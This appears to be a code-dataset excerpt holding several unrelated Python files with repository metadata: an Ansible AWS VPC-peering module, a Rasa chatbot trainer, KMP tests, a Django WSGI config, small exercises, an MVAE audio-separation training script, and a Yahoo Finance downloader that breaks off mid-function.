        tags (list): Desired tags in AWS format ([{'Key': ..., 'Value': ...}]).

    Kwargs:
        accept_peer (bool): When True, accept the pending peer.
        accept_with_profile (str): Boto3 profile used to accept a
            cross-account peer; requires *region*.
        region (str): AWS region used together with accept_with_profile.
        accepter_routes (list): Route table ids to point at the accepter CIDR.
        requester_routes (list): Route table ids to point at the requester CIDR.
        check_mode (bool): Pass DryRun to the AWS API calls. default=False

    Returns:
        Tuple (success, changed, err_msg, result)
    """
    success = False
    changed = False
    err_msg = ""
    result = dict()
    success, err_msg, results = (
        describe_peering_connections(
            client, vpc_peering_id=vpc_peering_id,
            status_codes=['active', 'pending-acceptance', 'initiating-request'],
            check_mode=check_mode
        )
    )
    if results:
        peer_info = convert_to_lower(results[0])
        tag_update_success, tag_err_msg = (
            update_tags(
                client, vpc_peering_id, tags, check_mode=check_mode
            )
        )
        if tag_update_success:
            if (is_active(peer_info) or is_pending(peer_info)
                or is_initiating_request(peer_info)):
                vpc_peering_id = peer_info['vpc_peering_connection_id']
                changed = True
                status_codes = ['pending-acceptance']
                # Remember the requesting account's client; it may be swapped
                # for a profile client below when accepting cross-account.
                original_client = client
                if accept_peer:
                    if accept_with_profile:
                        # Switch to the accepting account's boto3 profile.
                        accept_client, err_msg = (
                            create_client_with_profile(
                                accept_with_profile, region
                            )
                        )
                        if err_msg:
                            success = False
                        else:
                            client = accept_client
                    if success:
                        success, changed, err_msg, results = (
                            accept(
                                client, vpc_peering_id, check_mode=check_mode
                            )
                        )
                        status_codes.append('active')
                    if success:
                        # Re-apply tags on the accepting side (via the
                        # profile client for cross-account peers).
                        success, err_msg = (
                            update_tags(
                                client, vpc_peering_id, tags,
                                check_mode=check_mode
                            )
                        )
                _, _, result = (
                    describe_peering_connections(
                        client, vpc_peering_id=vpc_peering_id,
                        status_codes=status_codes, check_mode=check_mode
                    )
                )
                if result and success:
                    result = convert_to_lower(result[0])
                    # Route updates run against the requesting account's
                    # client unless accepting via a cross-account profile.
                    if (accepter_routes and not accept_with_profile or
                        requester_routes):
                        client = original_client
                    if accepter_routes or requester_routes:
                        success, changed, _ = (
                            pre_update_routes(
                                client, result, accepter_routes,
                                requester_routes, check_mode
                            )
                        )
    return success, changed, err_msg, result
def create(client, vpc_id, vpc_peer_id, tags, peer_owner_id=None,
           accept_peer=False, accept_with_profile=None, region=None,
           accepter_routes=None, requester_routes=None, check_mode=False):
    """Create a local and cross account vpc peering connection.

    Finds an existing active peering for (vpc_id, vpc_peer_id) and updates it,
    or creates a new one, then delegates tagging/acceptance/routing to
    ``update``.

    Args:
        client (botocore.client.EC2): Boto3 client.
        vpc_id (str): The requestor vpc_id.
        vpc_peer_id (str): The accepter vpc_id.
        tags (list): List of dictionaries containing the tags you would like to
            add or update in this peer.
    Kwargs:
        peer_owner_id (str): The AWS Account you want to peer against.
            default=None
        accept_peer (bool): if set to True, the peer will be accepted.
            default=False (Peer will only be accepted if it is in the same AWS account)
        accept_with_profile (str): The name of the profile that you have set in your
            ~/.aws/credentials profile.
        region (str): The aws region you want to connect to.
        accepter_routes (list): list of route table ids that you want
            to add routes to the cidr that belongs to the peer of the newly
            created peering_connection
            default=None
        requester_routes (list): list of route table ids that you want
            to add routes to the cidr that belongs to the vpc that is
            initiating the creation of the newly created peering_connection
            default=None
        check_mode (bool): This will pass DryRun as one of the parameters to the aws api.
            default=False
    Basic Usage:
        >>> client = boto3.client('ec2')
        >>> vpc_id = 'vpc-1234567'
        >>> vpc_peer_id = 'vpc-7654321'
        >>> tags = [{'Name': 'Service', 'Values': ['Development']}]
        >>> create(client, vpc_id, vpc_peer_id, tags, accept_peer=True)
        (True, True, "", {lower-cased peering-connection description, e.g.
         'status', 'tags', 'accepter_vpc_info', 'vpc_peering_connection_id',
         'requester_vpc_info'})
    Return:
        Tuple (bool, bool, str, dict)
    """
    # runit: a new peering connection must be created.
    # updateit: an existing (or freshly created) connection must be updated.
    runit = False
    updateit = False
    changed = False
    success = False
    err_msg = ''
    results = dict()
    params = {
        'VpcId': vpc_id,
        'PeerVpcId': vpc_peer_id,
        'DryRun': check_mode
    }
    if peer_owner_id:
        params['PeerOwnerId'] = peer_owner_id
    # Check whether an active peering already exists between the two VPCs.
    success, err_msg, results = (
        describe_peering_connections(
            client, params['VpcId'], params['PeerVpcId'],
            status_codes=['active']
        )
    )
    if results:
        updateit = True
    else:
        runit = True
    if runit:
        # No active connection found: request a new peering connection.
        success, changed, err_msg, results = (
            runner(client, 'present', params)
        )
        if success and changed:
            updateit = True
    if updateit:
        # `describe_peering_connections` returns a list; `runner` may not.
        if isinstance(results, list):
            results = convert_to_lower(results[0])
        vpc_peering_id = results['vpc_peering_connection_id']
        # Apply tags, optionally accept the peer (possibly via another
        # credentials profile) and set up routes on both sides.
        success, changed, err_msg, results = (
            update(
                client, vpc_peering_id, tags, accept_peer,
                accept_with_profile, region, accepter_routes,
                requester_routes, check_mode
            )
        )
        if success:
            err_msg = ''
            results = convert_to_lower(results)
            if results.get('tags', None):
                results['tags'] = convert_list_of_tags(results['tags'])
    return success, changed, err_msg, results
def main():
    """Ansible module entry point for managing EC2 VPC peering connections.

    Supports states: present (create/update), absent (delete),
    accept and reject.
    """
    argument_spec = ec2_argument_spec()
    argument_spec.update(
        dict(
            accepter_routes=dict(type='list'),
            requester_routes=dict(type='list'),
            vpc_id=dict(),
            vpc_peer_id=dict(),
            vpc_peering_id=dict(),
            peer_owner_id=dict(),
            accept_peer=dict(type='bool', default=False),
            profile=dict(),
            accept_with_profile=dict(),
            resource_tags=dict(type='dict'),
            state=dict(
                default='present', choices=[
                    'present', 'absent', 'accept', 'reject'
                ]
            )
        )
    )
    module = AnsibleModule(
        argument_spec=argument_spec,
        supports_check_mode=True,
    )
    if not HAS_BOTO3:
        module.fail_json(msg='boto3 is required.')
    check_mode = module.check_mode
    accept_with_profile = module.params.get('accept_with_profile')
    accepter_routes = module.params.get('accepter_routes')
    requester_routes = module.params.get('requester_routes')
    boto_profile = module.params.get('profile')
    vpc_id = module.params.get('vpc_id')
    vpc_peer_id = module.params.get('vpc_peer_id')
    vpc_peering_id = module.params.get('vpc_peering_id')
    peer_owner_id = module.params.get('peer_owner_id')
    accept_peer = module.params.get('accept_peer')
    tags = module.params.get('resource_tags')
    state = module.params.get('state').lower()
    if tags:
        # Convert {key: value} into the AWS [{'Key':..,'Value':..}] shape.
        tags = make_tags_in_aws_format(tags)
    # Parameter cross-validation that AnsibleModule can not express directly.
    if state == 'present' and not tags:
        err_msg = "parameters state=present and tags are required together"
        module.fail_json(
            success=False, changed=False, result={}, msg=err_msg
        )
    if accept_with_profile and state == 'present' and not accept_peer:
        err_msg = "accept_with_profile can only be used with accept_peer"
        module.fail_json(
            success=False, changed=False, result={}, msg=err_msg
        )
    try:
        region, ec2_url, aws_connect_kwargs = (
            get_aws_connection_info(module, boto3=True)
        )
        client = (
            boto3_conn(
                module, conn_type='client', resource='ec2',
                region=region, endpoint=ec2_url, **aws_connect_kwargs
            )
        )
    # FIX: `except ExcType, e` is Python-2-only syntax; `as` works on 2.6+/3.x.
    except botocore.exceptions.ClientError as e:
        err_msg = 'Boto3 Client Error - {0}'.format(str(e.msg))
        module.fail_json(
            success=False, changed=False, result={}, msg=err_msg
        )
    if boto_profile:
        # Explicit credentials profile overrides the default connection.
        client, err_msg = create_client_with_profile(boto_profile, region)
        if err_msg:
            module.fail_json(
                success=False, changed=False, result={}, msg=err_msg
            )
    if state == 'accept':
        success, changed, err_msg, results = (
            accept(client, vpc_peering_id, check_mode=check_mode)
        )
        if success and changed:
            err_msg = (
                'Peering connection {0} accepted.'
                .format(vpc_peering_id)
            )
    elif state == 'present':
        success, changed, err_msg, results = (
            create(
                client, vpc_id, vpc_peer_id, peer_owner_id=peer_owner_id,
                tags=tags, accept_peer=accept_peer,
                accept_with_profile=accept_with_profile,
                accepter_routes=accepter_routes,
                requester_routes=requester_routes, check_mode=check_mode,
                region=region
            )
        )
        if success and changed:
            vpc_peering_id = results['vpc_peering_connection_id']
            status_code = results['status']['code']
            err_msg = (
                'peering connection {0} created. Current status is {1}.'
                .format(vpc_peering_id, status_code)
            )
    elif state == 'reject':
        success, changed, err_msg, results = (
            reject(client, vpc_peering_id, check_mode=check_mode)
        )
        if success and changed:
            err_msg = 'Peering connection {0} rejected.'.format(vpc_peering_id)
    elif state == 'absent':
        success, changed, err_msg, results = (
            delete(client, vpc_peering_id, check_mode=check_mode)
        )
        if success and changed:
            err_msg = 'Peering connection {0} deleted.'.format(vpc_peering_id)
    if success:
        module.exit_json(
            success=success, changed=changed, msg=err_msg, **results
        )
    else:
        module.fail_json(
            success=success, changed=changed, msg=err_msg, result=results
        )
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
[
"asanabria@linuxdynasty.org"
] |
asanabria@linuxdynasty.org
|
5c103efa039afb5675e58e1d72848406ed515778
|
e5f48d7ffdb830d6a4cb723f0dc5c200225dcb4a
|
/train_init.py
|
f329d0e44fc9cb3c8a23da70db75405843d177ae
|
[] |
no_license
|
poornimaarunp/Foodie_bot
|
5dfaf33c194b069a1e9ca2a3c3a5d4455a2667d5
|
b2694c64e0c7d7cadf2b4f99c6aa2ea670f538dd
|
refs/heads/master
| 2020-04-14T17:04:17.981562
| 2019-01-12T19:39:18
| 2019-01-12T19:39:18
| 163,969,285
| 0
| 5
| null | 2019-01-12T19:39:19
| 2019-01-03T12:19:26
|
Python
|
UTF-8
|
Python
| false
| false
| 952
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import logging
from rasa_core.agent import Agent
from rasa_core.policies.keras_policy import KerasPolicy
from rasa_core.policies.memoization import MemoizationPolicy
from rasa_core.featurizers import (MaxHistoryTrackerFeaturizer, BinarySingleStateFeaturizer)
import warnings
warnings.filterwarnings("ignore")
if __name__ == '__main__':
    # Train the Rasa Core dialogue policies from the Markdown stories file
    # and persist the resulting model under ./models/dialogue.
    logging.basicConfig(level='INFO')
    training_data_file = './data/stories.md'
    model_path = './models/dialogue'
    # Featurize the last 5 dialogue turns as binary state vectors for Keras.
    featurizer = MaxHistoryTrackerFeaturizer(BinarySingleStateFeaturizer(), max_history=5)
    # Memoization handles exact story matches (last 4 turns); Keras generalizes.
    agent = Agent('restaurant_domain.yml', policies = [MemoizationPolicy(max_history = 4), KerasPolicy(featurizer)])
    agent.train(
        training_data_file,
        augmentation_factor = 50,
        #max_history = 4,
        epochs = 500,
        batch_size = 30,
        validation_split = 0.2)
    agent.persist(model_path)
|
[
"poornimadevi_pandurangan@intuit.com"
] |
poornimadevi_pandurangan@intuit.com
|
4cdb15c5e29b3981667bd910b1ec91ca2e02c3d0
|
498248ed6d299d99d5bf4c8f6f5e5b30f9c3830f
|
/strings/kmp_test.py
|
e2a510b86174d22c2b56e029796d055ace04bb7d
|
[
"MIT"
] |
permissive
|
tacores/algo-box-py
|
23d21d453146426d22117c5eb32fa733d9a2a6a4
|
a7c0ee6dcdd1cdcb79062f2c275e00dbb2db35cc
|
refs/heads/master
| 2022-12-07T05:33:50.645550
| 2022-11-25T05:25:22
| 2022-11-25T05:25:22
| 47,456,068
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 874
|
py
|
from kmp import find_pattern
from kmp import compute_prefix_function
import unittest
class kmp_test(unittest.TestCase):
    """Unit tests for the Knuth-Morris-Pratt string-matching helpers."""

    def test_sample1(self):
        # Pattern longer than the text: no match is possible.
        self.assertEqual(find_pattern('TACG', 'GT'), [])

    def test_sample2(self):
        # Overlapping occurrences must both be reported.
        self.assertEqual(find_pattern('ATA', 'ATATA'), [0, 2])

    def test_sample3(self):
        # Multiple non-adjacent occurrences in a longer text.
        self.assertEqual(
            find_pattern('ATAT', 'GATATATGCATATACTT'), [1, 3, 9])

    def test_compute_prefix_function1(self):
        # Failure-function table for a pattern with a repeated prefix.
        self.assertEqual(
            compute_prefix_function('abababcaab'),
            [0, 0, 1, 2, 3, 4, 0, 1, 1, 2])
if __name__ == '__main__':
unittest.main()
|
[
"buttix@gmail.com"
] |
buttix@gmail.com
|
583649e90ac9a7a34d488bf599da060220579864
|
aaa44fed6e0ccb7072f39e77aac73d94dca5616d
|
/paas/wsgi.py
|
effee3dd6f45fc692edf8ead26b88dba10256889
|
[] |
no_license
|
heidsoft/open_paas
|
d37a525554ab49002508dffcdad65575d8f2ced4
|
42ae862b7460efa05b8f1a6d0503933091b7d5de
|
refs/heads/master
| 2021-01-25T04:59:24.969189
| 2017-06-06T09:28:09
| 2017-06-06T09:28:09
| 93,500,133
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 547
|
py
|
"""
WSGI config for paas project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
from gevent import monkey
# patches stdlib (including socket and ssl modules) to cooperate with other greenlets
monkey.patch_all()
import os
from django.core.wsgi import get_wsgi_application
from dj_static import Cling
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
application = Cling(get_wsgi_application())
|
[
"heidsoft@sina.com"
] |
heidsoft@sina.com
|
82a2f1e425e03421f482e49454ad009e38420e6b
|
9300f0f196d598204be5392e4461551d45654bb2
|
/Programmers/Level1/collatz-conjecture.py
|
8924ea26dfbc2603a9c7d6491b5c650a4e24d456
|
[] |
no_license
|
coding-Benny/algorithm-interview
|
dfcb6d85e300a9d786d571b9b5d28f86392555a2
|
3a1bda5a6b3dee892dba70f1f4e9aa13d1cfd510
|
refs/heads/master
| 2023-08-18T01:58:26.198842
| 2021-10-02T01:39:07
| 2021-10-02T01:39:07
| 281,088,935
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 447
|
py
|
# https://programmers.co.kr/learn/courses/30/lessons/12943
def solution(num: int) -> int:
    """Count Collatz steps needed to reach 1 from *num*.

    Returns -1 as soon as 500 steps have been taken without finishing
    (the check happens right after the 500th step, before re-testing num).
    """
    steps = 0
    while num != 1:
        num = num // 2 if num % 2 == 0 else 3 * num + 1
        steps += 1
        if steps == 500:
            return -1
    return steps
if __name__ == '__main__':
    # Smoke-test with the sample cases from the problem statement
    # (expected output: 8, 4, -1).
    res = solution(6)
    print(res)
    res = solution(16)
    print(res)
    res = solution(626331)
    print(res)
|
[
"noreply@github.com"
] |
coding-Benny.noreply@github.com
|
7c6cd5caddd898e5f3b193ec9e80d834777cb21f
|
a0c69a70c7b8337ead0aed583e494156dc342501
|
/pop.py
|
9cbdad1e6d41a077feec6ef9d9110813c39c254a
|
[] |
no_license
|
tashadanner/python-practice
|
d0811ec8f3ff5449ae64a6bba314ddb3ee52a278
|
7827aa99389d8a067928f151fbf2425b5ba3324f
|
refs/heads/main
| 2023-03-11T21:50:22.426803
| 2021-02-24T00:57:44
| 2021-02-24T00:57:44
| 340,515,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 817
|
py
|
city_name = "Instabul, Turkey"
pop_1927 = 691000
pop_2017 = 15029231
pop_1950 = 983000
pop_2000 = 8831800
pop_change = pop_2017 - pop_1927
percentage_gr = (pop_change/pop_1927) * 100
annual_gr = percentage_gr/(2017-1927)
def population_growth(year_one, year_two, population_one, population_two):
    """Average annual percentage growth rate between two census points."""
    delta = population_two - population_one
    total_percent = (delta / population_one) * 100
    return total_percent / (year_two - year_one)
print(annual_gr)
# Re-derive the same rates through the helper to sanity-check it.
set_one = population_growth(1927,2017,pop_1927,pop_2017)
print(set_one)
set_two = population_growth(1950,2000,pop_1950,pop_2000)
print(set_two)
report = f"The population of Istanbul grew from {pop_1927} to {pop_2017} for a total growth of {pop_change}. The annual growth rate during that time was {annual_gr}%."
print(report)
|
[
"tashalouisedanner@gmail.com"
] |
tashalouisedanner@gmail.com
|
3fe58f00ee2864c8d10f6843a6e31f920996f4c9
|
24a493bafc44dd081f79a728dcb4212a66cb7947
|
/src/main.py
|
a235d2f6f74d0a9de63e49dc3190c68857edeea2
|
[
"MIT"
] |
permissive
|
mori97/MVAE
|
b23c760c2e63346a75a37b208cd2e1db93c80535
|
fb8a705fd2a414554ecf760054a86bf50f305c8e
|
refs/heads/master
| 2023-03-03T15:45:14.324149
| 2021-02-12T04:07:37
| 2021-02-12T04:07:37
| 205,518,408
| 2
| 1
|
MIT
| 2019-10-08T08:24:31
| 2019-08-31T08:36:13
|
Python
|
UTF-8
|
Python
| false
| false
| 9,542
|
py
|
import argparse
import os
import re
import statistics as stat
try:
import cupy as cp
except ImportError:
cp = None
import librosa
import matplotlib.pyplot as plt
import mir_eval
import numpy as np
import torch
from torch.nn.utils import clip_grad_norm_
import torch.utils.data
from torch.utils.tensorboard import SummaryWriter
from torchaudio.functional import istft
from common import to_tensor
from cvae import CVAE, lossfun
from ilrma import ilrma
from make_dataset import N_FFT, HOP_LEN
from mvae import mvae
def train(model, data_loader, optimizer, device, epoch, writer):
    """Run one CVAE training epoch and log the mean batch loss to TensorBoard."""
    model.train()
    total_loss = 0
    for x, c in data_loader:
        # x: spectrogram batch, c: speaker label — exact shapes are set by the
        # dataset built in make_dataset; TODO confirm.
        x, c = x.to(device), c.to(device)
        log_sigma_sq, mu, logvar = model(x, c)
        loss = lossfun(x, log_sigma_sq, mu, logvar)
        total_loss += loss.item()
        optimizer.zero_grad()
        loss.backward()
        # Clip the global gradient norm to 2 before stepping.
        clip_grad_norm_(model.parameters(), 2)
        optimizer.step()
    writer.add_scalar('Loss/train', total_loss / len(data_loader), epoch)
def validate(model, val_dataset, baseline, device, epoch, writer):
    """Separate each validation mixture with MVAE and log BSS-eval metrics.

    Computes per-speaker-pair SDR/SIR/SAR (mean, stdev), writes the separated
    audio and comparison bar charts (vs. the ILRMA baseline) to TensorBoard.
    """
    model.eval()
    if_use_cuda = device != torch.device('cpu')
    xp = cp if if_use_cuda else np
    window = torch.hann_window(N_FFT).to(device)
    result = {'SDR': {}, 'SIR': {}, 'SAR': {}}
    for i, (src, mix_spec, speaker) in enumerate(val_dataset):
        if if_use_cuda:
            mix_spec = cp.asarray(mix_spec)
        separated, _ = mvae(mix_spec, model, n_iter=40, device=device)
        separated = separated.transpose(1, 0, 2)
        # Convert to PyTorch-style complex tensor (Shape = (..., 2))
        separated = xp.stack((xp.real(separated), xp.imag(separated)), axis=-1)
        if if_use_cuda:
            separated = to_tensor(separated)
        else:
            separated = torch.from_numpy(separated)
        with torch.no_grad():
            separated = istft(separated, N_FFT, HOP_LEN, window=window)
        separated = separated.cpu().numpy()
        sdr, sir, sar, _ =\
            mir_eval.separation.bss_eval_sources(src, separated)
        # FIX: the original if/else initialized a new speaker's lists to []
        # and discarded that first item's scores; a speaker seen only once
        # then crashed statistics.mean on an empty list.
        result['SDR'].setdefault(speaker, []).extend(sdr.tolist())
        result['SIR'].setdefault(speaker, []).extend(sir.tolist())
        result['SAR'].setdefault(speaker, []).extend(sar.tolist())
        sep_tensor0 = torch.from_numpy(separated[0, :]).unsqueeze(0)
        sep_tensor1 = torch.from_numpy(separated[1, :]).unsqueeze(0)
        writer.add_audio('eval/{}_0'.format(i), sep_tensor0, epoch, 16000)
        writer.add_audio('eval/{}_1'.format(i), sep_tensor1, epoch, 16000)
    for metric in result:
        for speaker in result[metric]:
            # NOTE: stat.stdev needs >= 2 samples; each mixture contributes
            # one score per separated channel, so a single item suffices.
            result[metric][speaker] = (stat.mean(result[metric][speaker]),
                                       stat.stdev(result[metric][speaker]))
    figures = bar_chart(baseline, result)
    for metric, figure in figures.items():
        writer.add_figure(f'eval/{metric}', figure, epoch)
def bar_chart(baseline, result):
    """Build one grouped bar chart per metric comparing baseline vs. MVAE.

    baseline / result: {metric: {speaker_pair: (mean, stdev)}}.
    Returns {metric: matplotlib Figure}.
    """
    ret = {}
    # Use the speaker pairs present in `result`; assumes `baseline` covers
    # the same keys — TODO confirm against baseline_ilrma output.
    speakers = list(result['SDR'].keys())
    speakers.sort()
    x = np.arange(len(speakers))
    width = 0.4
    for metric in result:
        baseline_mean = [baseline[metric][speaker][0] for speaker in speakers]
        baseline_stdv = [baseline[metric][speaker][1] for speaker in speakers]
        result_mean = [result[metric][speaker][0] for speaker in speakers]
        result_stdv = [result[metric][speaker][1] for speaker in speakers]
        figure, ax = plt.subplots()
        # Side-by-side bars with stdev error bars.
        ax.bar(x - width / 2, baseline_mean, width,
               yerr=baseline_stdv, label='Baseline')
        ax.bar(x + width / 2, result_mean, width,
               yerr=result_stdv, label='MVAE')
        ax.set_title(metric)
        ax.set_xticks(x)
        ax.set_xticklabels(speakers)
        ax.legend()
        ret[metric] = figure
    return ret
def baseline_ilrma(val_dataset, device):
    """Evaluate with ILRMA.

    Separates every validation mixture with plain ILRMA and returns
    per-speaker-pair BSS-eval statistics:
    {metric: {speaker_pair: (mean, stdev)}}.
    """
    if_use_cuda = device != torch.device('cpu')
    xp = cp if if_use_cuda else np
    window = torch.hann_window(N_FFT).to(device)
    ret = {'SDR': {}, 'SIR': {}, 'SAR': {}}
    for src, mix_spec, speaker in val_dataset:
        if if_use_cuda:
            mix_spec = cp.asarray(mix_spec)
        separated, _ = ilrma(mix_spec, n_iter=100)
        separated = separated.transpose(1, 0, 2)
        # Convert to PyTorch-style complex tensor (Shape = (..., 2))
        separated = xp.stack((xp.real(separated), xp.imag(separated)), axis=-1)
        if if_use_cuda:
            separated = to_tensor(separated)
        else:
            separated = torch.from_numpy(separated)
        with torch.no_grad():
            separated = istft(separated, N_FFT, HOP_LEN, window=window)
        separated = separated.cpu().numpy()
        sdr, sir, sar, _ =\
            mir_eval.separation.bss_eval_sources(src, separated)
        # FIX: same first-occurrence bug as in validate() — the original
        # else-branch replaced a new speaker's scores with empty lists,
        # dropping the first mixture and crashing stat.mean for speakers
        # that appear only once.
        ret['SDR'].setdefault(speaker, []).extend(sdr.tolist())
        ret['SIR'].setdefault(speaker, []).extend(sir.tolist())
        ret['SAR'].setdefault(speaker, []).extend(sar.tolist())
    for metric in ret:
        for speaker in ret[metric]:
            ret[metric][speaker] = (stat.mean(ret[metric][speaker]),
                                    stat.stdev(ret[metric][speaker]))
    return ret
def make_eval_set(path):
    """Make the evaluation dataset.

    Scans *path* for ``*_src.wav``/``*_mix.wav`` pairs named
    ``<spkA><nn>_<spkB><nn>_{src,mix}.wav`` and returns a list of
    (source_waveforms, mixture_spectrogram, "spkA-spkB") tuples.
    """
    src_wav_files = [x for x in os.listdir(path) if x.endswith('_src.wav')]
    ptn = r'(?P<speaker0>[A-Z]{2}\d)(?P<num0>\d\d)_' \
          r'(?P<speaker1>[A-Z]{2}\d)(?P<num1>\d\d)_src\.wav$'
    prog = re.compile(ptn)
    def zero_pad(x):
        # Pad so that (n_samples + HOP_LEN) is a multiple of 4*HOP_LEN,
        # splitting the padding between both ends.
        if (x.shape[1] + HOP_LEN) % (4 * HOP_LEN) == 0:
            return x
        rest = 4 * HOP_LEN - (x.shape[1] + HOP_LEN) % (4 * HOP_LEN)
        left = rest // 2
        right = rest - left
        return np.pad(x, ((0, 0), (left, right)), mode='constant')
    dataset = []
    for src_wav_file in src_wav_files:
        result = prog.match(src_wav_file)
        speaker0, file_num0 = result.group('speaker0'), result.group('num0')
        speaker1, file_num1 = result.group('speaker1'), result.group('num1')
        mix_wav_file = f'{speaker0}{file_num0}_{speaker1}{file_num1}_mix.wav'
        src_wav_path = os.path.join(path, src_wav_file)
        mix_wav_path = os.path.join(path, mix_wav_file)
        src, _ = librosa.load(src_wav_path, sr=16000, mono=False)
        mix, _ = librosa.load(mix_wav_path, sr=16000, mono=False)
        src, mix = zero_pad(src), zero_pad(mix)
        # Per-channel STFTs stacked on axis 1 — presumably
        # (freq, channel, frames); TODO confirm against mvae/ilrma input.
        mix_spec = np.stack(
            [librosa.stft(np.asfortranarray(x), N_FFT, HOP_LEN) for x in mix],
            axis=1)
        dataset.append((src, mix_spec, f'{speaker0}-{speaker1}'))
    return dataset
def main():
    """Parse CLI arguments, train the CVAE, and periodically evaluate/save."""
    parser = argparse.ArgumentParser(
        description='Train MVAE with VCC2018 dataset',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--train-dataset',
                        help='Path of training dataset.',
                        type=str, required=True)
    parser.add_argument('--val-dataset',
                        help='Path of validation dataset.',
                        type=str, required=True)
    parser.add_argument('--batch-size', '-b',
                        help='Batch size.',
                        type=int, default=32)
    parser.add_argument('--epochs', '-e',
                        help='Number of epochs.',
                        type=int, default=800)
    parser.add_argument('--eval-interval',
                        help='Evaluate and save model every N epochs.',
                        type=int, default=200, metavar='N')
    parser.add_argument('--gpu', '-g',
                        help='GPU id. (Negative number indicates CPU)',
                        type=int, default=-1)
    parser.add_argument('--learning-rate', '-l',
                        help='Learning Rate.',
                        type=float, default=1e-3)
    parser.add_argument('--output',
                        help='Save model to PATH',
                        type=str, default='./models')
    args = parser.parse_args()
    if not os.path.isdir(args.output):
        os.mkdir(args.output)
    if_use_cuda = torch.cuda.is_available() and args.gpu >= 0
    if if_use_cuda:
        device = torch.device(f'cuda:{args.gpu}')
        # CuPy must be pointed at the same GPU as PyTorch.
        cp.cuda.Device(args.gpu).use()
    else:
        device = torch.device('cpu')
    train_dataset = torch.load(args.train_dataset)
    train_dataloader = torch.utils.data.DataLoader(
        train_dataset, args.batch_size, shuffle=True)
    val_dataset = make_eval_set(args.val_dataset)
    # Compute the ILRMA baseline once up front; it does not change per epoch.
    baseline = baseline_ilrma(val_dataset, device)
    # Number of speakers is inferred from the one-hot label width.
    model = CVAE(n_speakers=train_dataset[0][1].size(0)).to(device)
    optimizer = torch.optim.Adam(model.parameters(), args.learning_rate)
    # TensorBoard
    writer = SummaryWriter()
    for epoch in range(1, args.epochs + 1):
        train(model, train_dataloader, optimizer, device, epoch, writer)
        if epoch % args.eval_interval == 0:
            validate(model, val_dataset, baseline, device, epoch, writer)
            # Save model (moved to CPU so the checkpoint is device-agnostic)
            model.cpu()
            path = os.path.join(args.output, f'model-{epoch}.pth')
            torch.save(model.state_dict(), path)
            model.to(device)
    writer.close()
|
[
"du@sap.ist.i.kyoto-u.ac.jp"
] |
du@sap.ist.i.kyoto-u.ac.jp
|
1ee80c958f20bd0cbdd8dd31c7aec4d8e5bb6ce6
|
a88f4151ffb6d06621970a517f31a80c8f35cbf7
|
/data_prepare.py
|
3ae070e9c2d6dbf1b7cb2a7bd73e89a001f26408
|
[] |
no_license
|
indiejoseph/nn_trading
|
74d6302fae632cf95679254a8f45c972dd7773d0
|
cce81b458f2c1947c7c58d7513ac155e881f5666
|
refs/heads/master
| 2021-01-21T16:39:27.371523
| 2016-01-04T16:09:59
| 2016-01-04T16:09:59
| 47,880,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,777
|
py
|
__author__ = 'Joseph Cheng <indiejoseph@gmail.com>'
__version__ = '0.1'
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
import urllib2
import os
import numpy as np
import sys
import codecs
from datetime import date, datetime
import matplotlib.pyplot as plt
# Yahoo Historical
YAHOO_HISTORICAL_URL = 'http://ichart.yahoo.com/table.csv'
class YahooHistorical(object):
    """Fetch and analyse Yahoo Finance daily historical quotes.

    Parsed rows live in ``self.data`` as dicts with keys
    ``date``/``open``/``high``/``low``/``close``/``vol``/``adj_close``,
    ordered oldest-first (Yahoo's CSV is newest-first and is reversed while
    parsing). Optional ``data_from``/``data_to`` bounds (datetime.date)
    restrict the kept range, inclusive on both ends.
    """

    def __init__(self, data_from=None, data_to=None):
        # Inclusive date filters applied after parsing; None disables a bound.
        self.data_from = data_from
        self.data_to = data_to

    def open(self, file):
        """Load quotes from a previously saved CSV file."""
        # NOTE(review): download() strips the CSV header before caching, but
        # _parse() skips the first line again, so open() on a cached file
        # drops one data row — confirm intended behavior before relying on it.
        with codecs.open(file, 'r', encoding='utf8') as f:
            csv = f.read()
        return self._parse(csv)

    def download(self, symbol):
        """Download daily quotes for *symbol*, cache to data/<symbol>.csv,
        and return the parsed rows."""
        dest_file = symbol + '.csv'
        dest_file = os.path.join(os.path.dirname(__file__), 'data', dest_file)
        query = urlencode({
            's': symbol,
            'g': 'd',
            'ignore': '.csv'
        })
        response = urllib2.urlopen(YAHOO_HISTORICAL_URL + '?' + query).read()
        lines = str(response).split('\n')
        # Cache without the header row or trailing blank line.
        fx = open(dest_file, 'w')
        for line in lines[1:-1]:
            fx.write(line + '\n')
        fx.close()
        return self._parse(response)

    def get(self):
        """Return the parsed rows (oldest first)."""
        return self.data

    def trading_range_breakout(self, n):
        """Return (rolling_max, rolling_min) of adj_close over windows of *n*."""
        prices = [row['adj_close'] for row in self.data]
        tmax = np.zeros(len(prices))
        tmin = np.zeros(len(prices))
        for idx, price in enumerate(prices):
            # NOTE(review): for idx < n the negative start index wraps around
            # the end of the list, mixing the newest prices into the first
            # windows — confirm whether that is intended.
            p = np.append(prices[idx-n:idx+1], price)
            tmax[idx] = np.max(p)
            tmin[idx] = np.min(p)
        return (tmax, tmin)

    def relative_strength(self, n=14):
        """
        compute the n period relative strength indicator
        http://stockcharts.com/school/doku.php?id=chart_school:glossary_r#relativestrengthindex
        http://www.investopedia.com/terms/r/rsi.asp
        """
        prices = [row['adj_close'] for row in self.data]
        deltas = np.diff(prices)
        seed = deltas[:n+1]
        up = seed[seed >= 0].sum()/n
        down = -seed[seed < 0].sum()/n
        rs = up/down
        rsi = np.zeros_like(prices)
        rsi[:n] = 100. - 100./(1. + rs)
        for i in range(n, len(prices)):
            delta = deltas[i - 1]  # cause the diff is 1 shorter
            if delta > 0:
                upval = delta
                downval = 0.
            else:
                upval = 0.
                downval = -delta
            # Wilder-style smoothing of the up/down averages.
            up = (up*(n - 1) + upval)/n
            down = (down*(n - 1) + downval)/n
